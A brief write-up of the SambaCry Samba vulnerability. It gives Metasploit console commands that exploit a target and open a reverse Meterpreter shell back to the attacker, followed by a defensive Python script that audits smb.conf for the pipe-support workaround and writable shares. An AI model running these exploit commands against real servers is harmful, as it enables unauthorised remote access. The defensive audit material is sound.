EternalRed (a.k.a. SambaCry) Exploit

Much like the EternalBlue exploit, which was publicly released in April 2017 after being stolen from the NSA, Samba was found to have a remote code execution vulnerability of its own.

The flaw was introduced in Samba version 3.5.0, released in March 2010, and lies in the is_known_pipename() function.

Proof of Concept

Enumeration

Exploit

On the attacking machine, run msfconsole and set the following options:

> use exploit/linux/samba/is_known_pipename
> set SMBUSER <username> (optional)
> set SMBPASS <password> (optional)
> set TARGET <target>
> set payload linux/x64/meterpreter/reverse_tcp
> set rhosts <target ip address>
> set lhost <your ip address>
> exploit
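As an added example on the defensive side (not part of the original write-up), a small Python check that parses an smb.conf and reports whether the Samba project's published workaround, nt pipe support = no in the [global] section, is in place, and which shares are writable, since this exploit requires a writable share. The sample configuration below is constructed for illustration; the helper names are the author's own.

```python
import re

# Constructed sample smb.conf for the demonstration; not from any real host.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
[public]
   path = /srv/samba/public
   read only = no
   guest ok = yes
[docs]
   path = /srv/samba/docs
   read only = yes
"""

def parse_smb_conf(text):
    """Return {section: {key: value}} for smb.conf-style text (keys/values lowercased)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # skip blanks and comments
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:                                    # new [section]
            current = m.group(1).strip().lower()
            sections[current] = {}
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip().lower()
    return sections

def _is_true(value):
    return value in ("yes", "true", "1")

def is_writable(share):
    """Samba defaults to read only = yes; writable/writeable = yes inverts that."""
    if "read only" in share:
        return not _is_true(share["read only"])
    return any(_is_true(share[k]) for k in ("writable", "writeable") if k in share)

def audit_smb_conf(text):
    """Report the named-pipe workaround state and every writable share."""
    conf = parse_smb_conf(text)
    # The workaround disables named-pipe support entirely, which also removes
    # some functionality Windows clients expect, so it is a stopgap, not a patch.
    pipes_disabled = conf.get("global", {}).get("nt pipe support") == "no"
    writable = [n for n, s in conf.items() if n != "global" and is_writable(s)]
    return {"nt_pipe_support_disabled": pipes_disabled, "writable_shares": writable}
```

Run audit_smb_conf() over the real /etc/samba/smb.conf on a host that cannot yet be upgraded; a writable share together with a missing workaround is the exposed state.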